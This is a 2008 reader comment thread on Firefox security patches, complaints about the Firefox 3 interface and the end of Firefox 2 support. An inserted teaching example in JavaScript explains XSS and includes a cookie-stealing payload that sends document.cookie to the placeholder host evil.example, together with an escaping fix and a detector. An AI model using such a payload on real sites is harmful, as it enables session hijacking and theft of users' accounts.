This could be fun...
fanbitches will struggle here.
IE gets shafted by a flaw, so people move to Opera (as per "security experts'" advice), oh poo, that has holes, off to FF, ahh crap. Safari... Oops.
Yup we are all buggered.
Mozilla has rushed out updates to plug a few critical holes in versions 2 and 3 of its popular open source Firefox browser. Firefox 3.0.5 fixes three critical security flaws in the browser, while 2.0.0.19 stitches four critical vulns. Mozilla said that XSS vulnerabilities in SessionStore, XSS and so-called JavaScript “ …
Typical of Microsoft to release a half finished, half baked browser with all these XSS vulnerabilities and so on, plus charging over the odds for Apple's shiny look on this Chromey shiny Safari Vista!
Bah... I'm off to hand code HTML packets on my tuxedo wearing flightless cold bird flu iPenguin with the controlled hardware software combo from Redhatmondtino.
MS, Opera, and Mozilla are all rushing out critical fixes this week. Maybe one development model isn't inherently better than another. Maybe the only real way to ensure browser developers care about security is to enforce it from the user end by maintaining the competition and letting your favorite developer know you can and will switch whenever they seem to get too lazy...
Oh, wait, this is The Register. Opera got theirs out first! Suck on that, monolithic and open-source development fanbois!
As I understand it, XSS is using Javascript (or similar) to make objects from one domain appear to be from another. It also appears that every browser out there that supports scripting has been found to be unsafe in its handling of XSS.
So, my question is, is this a flaw in the implementation or is this how things were originally intended to work? The recent article about Google's scripts being referenced by Obama's website suggests that scripts from other domains are supposed to appear to be from the original domain and that the real problem here is that people let anyone who feels like it embed anything they like on their pages.
Secondly, using NoScript even before its "XSS Prevention" used to prevent a lot of problems provided you whitelisted your sites correctly -- what's the difference between this and the new "XSS attack prevention"?
Can anyone who knows their stuff explain?
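The following is an added illustration for the question above; it is not part of the original thread, not Mozilla's code, and says nothing about the specific SessionStore bugs the article refers to. It shows the general shape of an XSS flaw in a page: untrusted text (a comment, a URL parameter, a restored session value) is concatenated into HTML, so markup the attacker supplied runs in the page's own origin, with that origin's cookies and DOM. The function names, the `evil.example` host and the sample comment are all constructed for the example.

```javascript
// Added example (not from the thread or from Mozilla): a minimal XSS bug,
// its fix, and a rough output check. All names and inputs are constructed.

// Constructed attacker-supplied comment body. The <img> never loads, so the
// onerror handler fires and ships the page's cookies to a host the attacker
// controls (evil.example is a placeholder, not a real site).
const ATTACKER_COMMENT =
  '<img src=x onerror="document.location=\'https://evil.example/?c=\'+document.cookie">';

// Vulnerable: untrusted text is pasted straight into the markup, so the
// commenter's <img ... onerror=...> becomes part of the page and runs with the
// page's origin. This is what an "XSS vulnerability" in a page or a browser
// feature boils down to.
function renderCommentUnsafe(author, body) {
  return '<div class="comment"><b>' + author + '</b>: ' + body + '</div>';
}

// Fix: escape the characters that can change HTML structure before inserting
// untrusted text into element content or a double-quoted attribute. The
// browser then shows the attacker's text literally instead of parsing it.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderCommentSafe(author, body) {
  return '<div class="comment"><b>' + escapeHtml(author) + '</b>: ' + escapeHtml(body) + '</div>';
}

// Rough reviewer's check over rendered output: flag any tag the template did
// not write itself, or any tag carrying an on*= event-handler attribute.
// Only real tags (text starting with '<') are examined, so the escaped
// "&lt;img ... onerror=..." in the safe output is correctly ignored.
function containsInjectedMarkup(html, templateTags) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some(function (tag) {
    const name = tag.match(/^<\/?([a-zA-Z][a-zA-Z0-9]*)/)[1].toLowerCase();
    return !templateTags.includes(name) || /\son[a-z]+\s*=/i.test(tag);
  });
}

// Tags the comment template legitimately emits.
const TEMPLATE_TAGS = ['div', 'b'];

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderCommentUnsafe('mallory', ATTACKER_COMMENT));
  console.log('safe:  ', renderCommentSafe('mallory', ATTACKER_COMMENT));
  console.log('unsafe injected?', containsInjectedMarkup(renderCommentUnsafe('mallory', ATTACKER_COMMENT), TEMPLATE_TAGS));
  console.log('safe injected?  ', containsInjectedMarkup(renderCommentSafe('mallory', ATTACKER_COMMENT), TEMPLATE_TAGS));
}
```

Run it with `node xss.js`. The unsafe renderer emits a live `<img onerror=...>` tag and the check flags it; the safe renderer emits `&lt;img ...` and the check stays quiet. Escaping is context-specific: the escaper above is right for element text and double-quoted attributes, but not for text landing inside a `<script>` block, a URL, or CSS, each of which needs its own encoding.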
As always, I'll upgrade to Firefox 3 when they fix the UI and give us back a proper way of storing bookmarks.
Honestly, though, I don't understand the fanboys: the only reasons I can see why Firefox is actually perceptably better than any other browser is the plugins that (theoretically) give the USERS control over their browsing experience, and even there, the only two that really matter are Adblock and Noscript, without which the internet is basically broken and unusable. This is not the future I was promised.
And of course, those Firefox plug-ins (AdBlock and NoScript) were written to imitate native Opera features...
I think browsers are like AV - all vendors are going to have issues from time to time, and we all need to pay attention to updates and revisions. The big test for vendors is how responsive they are to fixing problems (right now, Apple appear to be the slowest of the major browser vendors - they even make MS look good by comparison!).
"Can't someone just make a browser that doesn't have gaping security holes to start with?"
Try w3m. Or lynx, links and the like. Or Dillo if you *need* a graphic mode. Of course, these are secure because they don't run scripts, so you won't be less safe with FF and scripts disabled.
You can use a filtering proxy to tidy up the pages, too. But then again, all the fancy JS sites will be broken. Seriously, who the heck started this scripting madness in the first place? Give me my HTML web back!
@AC 17th December 2008 17:55 GMT:
Funny, I thought "better browser" was supposed to mean something like "we don't dictate our view of how you should work on you the way Microsoft does." That was incorrect?
@AC 17th December 2008 19:09 GMT:
Funny, I could have sworn the point was at least in part to improve the experience for the user and to make it easier, rather than to stick things in databases that are no longer realistically maintainable through shell scripts and, as I recall, make dialogue boxes non-resizeable. Or are we defining "improved" in the typical "it works for me, therefore there's no problem" FOSS-developer way?
In what world is an SQL database an appropriate method of storing bookmarks? Just because some FF developers have so many bookmarks they need a database to keep track of them doesn't mean everybody does (and yes, I know FF3 stores a lot more than bookmarks there, equally without logical reason). Instead of foisting their half-baked ideas on everyone who uses FF they should rather get rid of all their obsolete and redundant bookmarks, or implement it as an extension. This is definitely an itch that didn't need scratching.
My feeling is that there must be a reason that every single browser on a Windows platform suffers from security holes. As long as the underlying operating system allows the application complete access to the system, rather than running it in a sandbox, we will see a never ending sequence of patches as yet more exploits are discovered in an ever expanding code base.
Now, if it was built on top of an inherently secure, compartmentalised operating system, it wouldn't matter how buggy the browser was, the users data would be protected.
I am sure that Linux and Mac are not perfect in this respect either.
How do you justify the headline for this article claiming Mozilla "rushed out" this security update? FF security updates are regular events, nothing new or "rushed" about this one I can see. No zero day vulns like IE just had - now that update was rushed out. Just because MS have rushed out a fix doesn't mean anyone else's updates have to be described as rushed. If you have any evidence for this claim then please provide it.
As you can see by going to https://wiki.mozilla.org/Releases, this release has been planned for weeks and is part of Mozilla's regular update. The next one is planned for Feb 3rd. Presumably we can expect another Register article about security panics on Feb 4th. Or would the Register prefer it if browser makers didn't patch their software?
FF2.0.0.19 will no longer be updated? EXCELLENT-- finally will be rid of those annoying "do you want to update now" popups that always seem to pop up when I'm doing something really important (such as working on my banking site, about to click on a sell order on my brokerage site, or about to snipe something on eBay). Now FF 2 is TRULY perfect.
The one that irks me is how the Back pulldown and Forward pulldown were merged into a single list with less total entries. Yes, IT DID MATTER. A lot of the time the page I want to jump back to is 10-15 pages back, especially if you've been browsing about on Amazon or similar. Now you only get 7 forward, 7 back, and the confusion of seeing the page you are currently on.
Add to that FF3's adoption of a NONSTANDARD cookie file format and their removal of useful stuff from Tools/Page Info and FF3 is a major regression for me. What? You thought Mozilla was all about standards? That went out about 4 years ago. Ever since it's been all about the chrome, baby! Look at that snazzy back/forward button that looks like something stolen from MS. How many extra cycles does it take to draw that versus a standard rectangular region?
Oh, and when FF first came out, then again in FF2 they took stuff out of Preferences and buried it in about:config. Now, with FF3 it's still buried in about:config but you're warned that you are mucking about in an area where you shouldn't! Seriously? Just to change my Ctrl+Wheel behavior?
Most of the people commenting here are crybabies. I use version 3 with no problems other than minor changes to about:config between major releases. I even got used to the awesomebar after guessing I would never like it. Now the sql storage is my ally, and I have no problem running even the nightlies on my windows, tiger and Linux boxes (even the slow ones). So why all the retardation? Are you not the people supposedly considering yourselves tech-literate? and Especially about the frequency of updates.. What the hell is wrong with you if you don't like your free software to be kept up to date? Guess there's just no pleasing some jerks.
Stop moaning. It's free.
If you don't like it, use another browser or write your own. Nobody's stopping you.
@Keith Doyle
No, you won't get any more updates for FF2. Of course, if you get screwed over by a vulnerability in an old and unsupported version of FF which you are using to control and run your finances via the web, then don't go whining that it's all Mozilla's fault. It won't be. It'll be your "change is scary" Luddite conservatism which is to blame.
My Firefox 3.0.4 on Ubuntu 8.10 seems to be chugging along without any problems.
Why am I not overwhelmed with paranoid type anxiety?
Anyway, what with Climate Change / Financial system Meltdown / Credit Crunch / Mr. Madoff of New York etc., I am surprised all you lot have not gone into your bunkers by now.
Want to turn off the 'Awesome' bar? Allow me to let you in to a closely guarded secret - you can do it! Just by typing, you don't need no stinkin' extension!
It's even been published on El Reg several times already!
There's a top secret L33t HaX0r way of finding out what to do. The thing is: there's this pretty good website called 'Google' that runs this, like, index of the Internet. And the best thing is - you can search it! So if you go to Google and you type in something really complex like
turn off Firefox awesome bar
Any one of the 74,800 hits will tell you ...
In the 'Awesome' bar type
about:config (and press Enter)
Find the line for
browser.urlbar.matchonlytyped
Click that line so that the value changes to true
The end.
Now put your computer back in the box it came in, and send it back to the manufacturer asking for a full refund.
Well, after reading the Reg for some six months, I've finally installed NoScript, so thanks Reg commentators, evidently repetition does work. Had Adblock and Firephorm (with BT until they change the T&Cs) for some time.
I still think Firefox is the best (and safest) when you include the plugins IMHO.
+1 to Firefox 3.
So they're not issuing any more updates for FF2. That's responsible.
Funny, isn't it, that the lovely, touchy-feely people at Mozilla are forcing their EUs to upgrade when even Microsoft don't indulge in that sort of behaviour. Updates for earlier versions of IE are still produced. And don't give me all that bull about their being non-profit-making. If they want to be taken seriously in the market then they need to provide the same service as the other players in the market.
"So, you fiddle around with your bookmarks using "Organise Bookmarks" until they do what you want, then you select the Backup/Restore button and you can then backup, restore or even <gasp!> Import and Export as HTML"
Even better, install the foxmarks plugin and you can share/backup your bookmarks on every PC you use
I take it that I'm the only person who doesn't really have a problem with Firefox 3 then?
That said, I'm thinking about jumping ship to Chrome once it comes out of Beta.
Actually, I just looked at the Google Chrome page and it's missing the Beta tag, so it looks like I'll be downloading and installing that when I get home today then!
Could the fans of the RetardedBar please explain why:
a) The FF3 "organise bookmark" interface is shittier than FF2's?
b) I have to export or backup my bookmarks in FF3 after editing any of them, or else the changes are reverted when I restart Firefox? And no, there are no permission problems.
And to those RetardedBar haters who can't Google, there are actually several things that need to be done to reduce the annoyance factor.
1) If you want the dropdown list, install the Oldbar extension; this makes the dropdown list appear like FF2's, but doesn't change the RetardedBar's behavior.
Then in about:config:
2) set browser.urlbar.matchOnlyTyped to true
3) set browser.urlbar.maxRichResults to 5 or so, or 0 if you don't want the drop-down at all.
This reduces the annoyance factor significantly. There are a couple of other settings that can be tweaked, but these are the most important. More are coming in FF3.1.
These settings would not be there if not for all the diligent bug-reporters who endured and rode out a tide of hatred from the Mozilla fanbois, and plain arrogance by several developers, during the Alpha and Beta testing of FF3.
Preach it, AC.
IE6: released 27 August 2001, supported until 13 Jul 2010
FF2: released 24 October 2006, supported until 16 December 2008
And people wonder why grown-up organisations - who are often squeezed to complete the evaluation, sign-off and rollout of an app in under two years find it hard to take the Mozilla org seriously? We are, after all, talking about an application which famously is about as amenable to centralised management as a pissed-off tomcat.
(aside: where's the Asa-Dotzler-with-horns piccy?)
Interesting that the FF3 fanbois are all ACs. At any rate, unlike most people (apparently), I don't depend on the browser for security. And that includes protection against phishing sites, buffer overflows and stealth XML, ActiveX or other such nonsense.
FF3 has resurrected all of the same reasons I stopped using Netscape, Mozilla and, for that matter, IE. The developers just don't get it. They can't keep themselves from bloating the browser with unnecessary and redundant features such as tabs and databases (and for that matter, bookmarking -- which needs to be accessed on all the user's computers and shouldn't be stored at all on web clients). And while they're so busy adding useless features, critical ones they should be concentrating on are completely ignored (like user interruption protection -- THOU SHALT NOT STEAL KEYBOARD FOCUS AWAY FROM ME WHILE I'M TYPING -- and while that may be the OS' job, if they're not doing it, the browser can and should).
I may move away from FF2 at some point, but I can tell you it ain't gonna be to FF3.
I'm just glad there is Seamonkey available, which doesn't treat you like a clueless newbie like IE and FF (as it wants to imitate IE) do.
For anyone frustrated with FF, try Seamonkey, same browsing engine as FF, therefore same extensions and plugins as FF, but much better UI, more configurable, and no useless cpu-consuming gimmicks.
I already tried that, it doesn't solve the main problem:
if I want to go to google, I start to type it in. When I type go, google should appear, being the most visited address starting with go. Instead, I get random websites that contain go in their title bar, or, even more annoyingly, IN THE MIDDLE OF THE URL. I only want it to match the start of a URL, not the middle, and not titles at all.